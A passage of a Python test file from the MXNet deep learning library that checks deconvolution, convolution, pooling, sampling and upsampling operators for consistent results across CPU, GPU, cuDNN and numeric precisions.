def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
@with_seed()
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. https://github.com/apache/incubator-mxnet/issues/11839")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear")
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/11517")
@with_seed()
def test_pooling_versions():
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride, pooling_convention='valid',
global_pool=False, p_value=2, count_include_pad=True, tol=None):
ctx_list = []
sym_list = []
# PoolingV1 cpu
if 'pool_v1_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# PoolingV1 gpu
if 'pool_v1_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling cpu
if 'pool_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool',
p_value=p_value, count_include_pad=count_include_pad))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool',
p_value=p_value, count_include_pad=count_include_pad))
# Pooling gpu
if 'pool_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=True, name='pool',
p_value=p_value, count_include_pad=count_include_pad))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=True,
name='pool', p_value=p_value, count_include_pad=count_include_pad))
# CuDNNPooling
if 'pool_cudnn' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, p_value=p_value, cudnn_off=False,
name='pool', count_include_pad=count_include_pad))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, p_value=p_value,
cudnn_off=False, name='pool', count_include_pad=count_include_pad))
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol)
def test_1d_pooling(pool_type, p_value=2, count_include_pad=True):
data = (2, 3, 20)
kernel = (4,)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, p_value=p_value, count_include_pad=count_include_pad)
def test_2d_pooling(pool_type, p_value=2, count_include_pad=True):
data = (2, 3, 20, 20)
kernel = (4, 5)
pad = (0, 0)
stride = (1, 1)
if pool_type == 'lp':
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value)
else:
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, count_include_pad=count_include_pad)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (0, 0)
stride = (1, 1)
if pool_type == 'lp':
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value)
else:
if count_include_pad:
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False,
count_include_pad=count_include_pad)
else:
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False,
count_include_pad=count_include_pad)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
if pool_type == 'lp':
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, p_value=p_value)
else:
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, count_include_pad=count_include_pad)
def test_3d_pooling(pool_type, p_value=2, count_include_pad=True):
data = (2, 3, 20, 20, 20)
kernel = (4, 5, 3)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, p_value=p_value, count_include_pad=count_include_pad)
test_1d_pooling('max')
test_1d_pooling('avg', count_include_pad=True)
test_1d_pooling('avg', count_include_pad=False)
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg', count_include_pad=True)
test_2d_pooling('avg', count_include_pad=False)
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
test_3d_pooling('max')
test_3d_pooling('avg', count_include_pad=True)
test_3d_pooling('avg', count_include_pad=False)
test_3d_pooling('sum')
test_3d_pooling('lp', p_value=1)
test_3d_pooling('lp', p_value=2)
test_3d_pooling('lp', p_value=3)
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
